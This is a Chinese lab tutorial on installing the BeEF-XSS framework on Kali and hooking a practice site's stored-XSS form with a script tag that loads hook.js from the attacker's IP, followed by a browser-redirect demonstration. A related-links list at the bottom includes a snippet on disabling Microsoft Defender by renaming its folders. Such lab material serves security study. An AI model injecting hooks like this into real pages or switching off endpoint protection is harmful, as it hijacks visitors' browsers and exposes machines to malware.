XSS另类攻击(四)kali系统beef-xss安装和使用

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

1、环境说明

kali系统,ip:192.168.242.4 ,攻击机

win7系统,ip: 192.168.242.5 ,靶机或部署服务机器

本文是为了下一篇《XSS另类攻击(五)Flash钓鱼配合MSF捆绑上线》准备。

2、kali系统配置准备

2.1、修改更新源目录
# 打开配置文件,按i进入编辑,按esc键退出编辑,输入【:wq!】保存
vim /etc/apt/sources.list# 建议使用中科大或清华的,阿里最近经常出现问题(日期:2024-05-30)
# 中科大
deb https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
# 清华
deb https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main non-free contrib
# 阿里
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib

在这里插入图片描述

2.2、增加数字签名
# 1.下载签名
wget archive.kali.org/archive-key.asc
# 2.安装签名
apt-key add archiv./e-key.asc
# 3.更新一下
apt-get update

修改新的源目录,一定要下载和安装签名,不然无法使用下载。

参考博客:https://blog.csdn.net/weixin_43343679/article/details/133500343

2.3、修改docker镜像源

一般情况一下,镜像源和更新源目录设置一样的。

# 创建或打开daemon.json
vim /etc/docker/daemon.json# 按I键进入编辑状态,退出按Esc,保存按【:wq!】,退出不保存按【:q!】。# daemon.json文件加入以下内容,如果已经存在文件,有配置就不需要再添加
{"registry-mirrors": ["https://mirrors.ustc.edu.cn"]
}
# 中科大
https://mirrors.ustc.edu.cn
# 清华
https://mirrors.tuna.tsinghua.edu.cn
# 阿里
https://mirrors.aliyun.com

3、安装beef-xss

注意安装时,先切换到root账号

# 切换到root账号
sudo su
# 先升级
apt-get update
# 安装命令
apt-get install beef-xss
3.1、查看或修改密码

如果忘记密码或者想修改密码,可以到是/usr/share/beef-xss/config.yaml 配置文件查看,是明文存储的。修改完需要重启服务才会生效。

# 1、打开配置文件
vim /usr/share/beef-xss/config.yaml
# 2、重启beef-xss服务
systemctl restart beef-xss

在这里插入图片描述

3.2、启动服务

首次启动,会要求修改密码,默认用户名/密码都是:beef,修改密码不可以beef。

# 启动命令
beef-xss

看到关键字:active (running) ,绿色才是启动成功。

在这里插入图片描述

访问后台地址:http://ip:3000/ui/panel

在这里插入图片描述

3.3、常用命令
# 启动beef-xss命令,默认用户名/密码都是:beef,要求修改密码
beef-xss
# 停止beef-xss服务命令
service beef-xss stop 
# 重启beef-xss服务
systemctl restart beef-xss
3.4、异常情况参考

如果启动服务后发现访问不了,可以参考:https://wiki.bafangwy.com/project-4/doc-322/ 。

4、beef-xss使用示例说明

以pikachu靶场的存储型XSS使用作为使用示例说明,

# 勾子脚本,IP地址是部署beef-xss服务的IP
<script src="http://192.168.242.4:3000/hook.js"></script>

把勾子脚本放到pikachu靶场的存储型XSS的留言框提交,

在这里插入图片描述

beef-xss后台刷新就可以看到被攻击的记录。
在这里插入图片描述

比如设置目标地址重定向想要的地址,设置完点按钮Execute,如果用户停留在目标页面或从其他页面再次访问目标页面就会自动重定向,但是如果没有再去点按钮Execute就不会重定向。

操作路径:

Commands
->Browser
->Hooked Domain
–>Redirect Browser

在这里插入图片描述

更多详细用法请使用参考:
https://bbs.huaweicloud.com/blogs/392268
https://blog.csdn.net/qq_53517370/article/details/128992559

5、我的公众号

敬请关注我的公众号:大象只为你,持续更新网安相关知识中…

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/20228.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

k8s的ci/cd实践之旅

书接上回k8s集群搭建完毕&#xff0c;来使用它强大的扩缩容能力帮我们进行应用的持续集成和持续部署&#xff0c;整体的机器规划如下&#xff1a; 1.192.168.8.156 搭建gitlab私服 docker pull gitlab/gitlab-ce:latest docker run --detach --hostname 192.168.8.156 --publ…

SAP 生产订单批量报工(代码分享)

最近公司一直在对成本这块的业务进行梳理,影响比较大的就是生产这块的报工,经常会要求要批量的冲销报工,然后在继续报工,来调整生产订单的实际工时,前面的博客中已经给大家分享了批量冲销生产订单的代码, 下面给大家分享一下生产订单批量报工的代码 首先流程制造和离散制…

推荐几首听无数遍也听不腻的好歌(1)

1.Wannabe (Spice Girls Cover) 这首歌是Why Mona创作的首红眼特效的歌&#xff0c;唱的像牙痛的唱不清楚&#xff0c;但配上超级劲爆的旋律及节奏&#xff0c;简直好听到爆 2.Down For Life (Reset) 这首HSHK创作的纯音乐&#xff0c;虽然旋律一直重复一个调&#xff0c;但…

【算法】过桥

✨题目链接&#xff1a; 过桥 ✨题目描述 ✨输入描述: 第一行一个数n(2≤n≤2000) 接下来一行n个数a[i](1≤|a[i]|≤2000)表示浮块上的数字 ✨输出描述: 输出一行&#xff0c;表示对应的答案 ✨示例1 &#x1f4cd;输入 4 2 2 -1 2 &#x1f4cd;输出 2 &#x1f4cd;说明 1…

前端经典手写面试题---节流防抖

防抖 定义: n 秒后在执行该事件&#xff0c;若在 n 秒内被重复触发&#xff0c;则重新计时。 场景: 搜索框搜索输入。只需用户最后一次输入完&#xff0c;再发送请求手机号、邮箱验证输入检测窗口大小resize。只需窗口调整完成后&#xff0c;计算窗口大小。防止重复渲染。 实…

HNCTF 2024 ez_pecp 冰蝎+CS流量分析

考点:冰蝎webshell流量分析CS4.x流量解密 给了两个 流量包 第一个 ctf1.pcapng 查看其HTTP请求 而在CS中流量特征是基于tls协议 http-beacon 通信中&#xff0c;默认使用 GET 方法向 /dpixel 、/__utm.gif 、/pixel.gif 等地址发起请求&#xff0c;而且下发指令的时候会请求 …

如何使用浔川AI翻译机?——浔川AI社

1 前言 对于“如何使用浔川AI翻译机&#xff1f;”这个问题&#xff0c;我们官方 总结出以下结论&#xff1a; 首先&#xff1a; 复制以下代码&#xff1a; # -*- coding: utf-8 -*- import tkinter as tk import tkinter.messagebox import pickle import random# 窗口 wi…

Springboot校验集合是否为空,校验集合内对象参数

一、示例1 public AjaxResult saveQuoted(RequestBody NotEmpty List< Valid HisParam> list) {}二、示例2 public class Comment {NotNull(message "orderId 不能为空")private Long orderId;ValidNotEmpty(message "itemList不能为空")private…

Jmeter压测中遇到的问题汇总

Jmeter使用过程问题总结 一、某个请求的请求体中有中文字段&#xff0c;执行后该请求无法成功 解决方法&#xff1a;在取样器的内容编码处加上UTF-8 二、遇到接口请求后报401&#xff0c;请求未授权&#xff08;或者信息头管理器只写了cookie请求不成功&#xff09; 解决方…

记录深度学习GPU配置,下载CUDA与cuDnn,安装tensorflow

目标下载: cuda 11.0.1_451.22 win10.exe cudnn-11.0-windows-x64-v8.0.2.39.zip Anaconda的安装请看别的博主的,这里不再赘述 看看自己电脑的cuda 方法一:打开英伟达面板查看 方法二:使用命令行 随便找个文件夹,在顶部路径输入"cmd" 输入下面命令 nvidia-smi 我…

【TensorFlow深度学习】深度学习中的梯度传播机制解析

深度学习中的梯度传播机制解析 反向传播基础理论概览梯例&#xff1a;Sigmoid激活函数的梯度传播实战例代码结构反向传播机制的精髓结语 深度学习中的梯度传播机制&#xff1a;揭秘神经网络的核心算法 深度学习的兴起&#xff0c;离不开一个至关重要的算法——反向传播&#xf…

2406C++,ADL加隐式转换

原文 最近在搞iguana.struct_pb动态反射功能时,遇见一个奇怪的问题. struct person {std::string name;int64_t age; }; REFLECTION(person, name, age); struct persons {std::vector<person> list; }; REFLECTION(persons, list); //#1 static_assert(iguana::is_publ…

小程序配置自定义tabBar及异形tabBar配置操作

什么是tabBar&#xff1f; 小程序的tabbar是指小程序底部的一组固定导航按钮&#xff0c;通常包含2-5个按钮&#xff0c;用于快速切换小程序的不同页面。每个按钮都有一个图标和文本标签&#xff0c;点击按钮可以切换到对应的页面。tabbar通常放置在小程序的底部&#xff0c;以…

vue 权限分组

在权限设计时&#xff0c;分为部门、岗位、人员三部分&#xff0c; 人员下面挂部门&#xff0c;部门下面挂岗位&#xff0c;岗位下面挂菜单&#xff0c;用户在进行授权时&#xff0c;勾选了操作权限&#xff0c;默认数据权限也进行勾选。 权限组&#xff1a;查询、新增、修改、…

开发一套家政上门预约服务系统需要运用的关键技术

家政上门预约服务系统开发是指建立一个在线平台或应用程序&#xff0c;用于提供家政服务的预约和管理功能。该系统的目标是让用户能够方便地预约各种家政服务&#xff0c;如保洁、家庭护理、月嫂、家电维修等&#xff0c;并实现服务供应商管理和订单管理等功能。 开发一套家政上…

01Linux以及操作系统概述

课程目标 1.了解现代操作系统的整体构成及发展历史 2.了解Linux操作系统及其分支版本 3.直观上理解服务器端与桌面端版本的区别 课程实验 1.通过对CentOS和Ubuntu的演示&#xff0c;直观理解Linux与Windows的异同 课堂引入 本章内容主要为大家详细讲解Linux操作系统(以下简…

PPT 隐藏开启对象图层

目录预览 一、问题描述二、解决方案三、参考链接 一、问题描述 制作PPT的时候&#xff0c;有时候需要在一张PPT放置多个依次出现的内容&#xff0c;然后设置对应的动画&#xff0c;要是需要对某个内容进行修改的话&#xff0c;就会很不方便&#xff0c;这个时候就需要使用&…

flutter 自定义本地化-GlobalMaterialLocalizations(重写本地化日期转换)

1. 创建自定义 GlobalMaterialLocalizations import package:flutter_localizations/flutter_localizations.dart; import package:kittlenapp/utils/base/date_time_util.dart;///[auth] kittlen ///[createTime] 2024-05-31 11:40 ///[description]class MyMaterialLocaliza…

基于SpringBoot的旅游攻略信息系统的设计与实现

文档介绍 用户群体 针对已经学习过SpringBoot的同学,希望通过一个项目来加强对框架的应用能力,增加项目经验 针对需要完成大学期间的毕设项目的同学,可以通过此文档了解整个系统技术架构,为自己的毕设论文提供指导性建议 文档内容 此文档内容可以让学习此实战项目的同学有一…

有效2,关闭 Microsoft Defender 实时保护,u盘启动进入pe

将以下文件夹改名 “C:\Program Files\Windows Defender” “C:\Program Files\Windows Defender Advanced Threat Protection” “C:\Program Files (x86)\Windows Defender” “C:\ProgramData\Microsoft\Windows Defender” “C:\ProgramData\Microsoft\Windows Securi…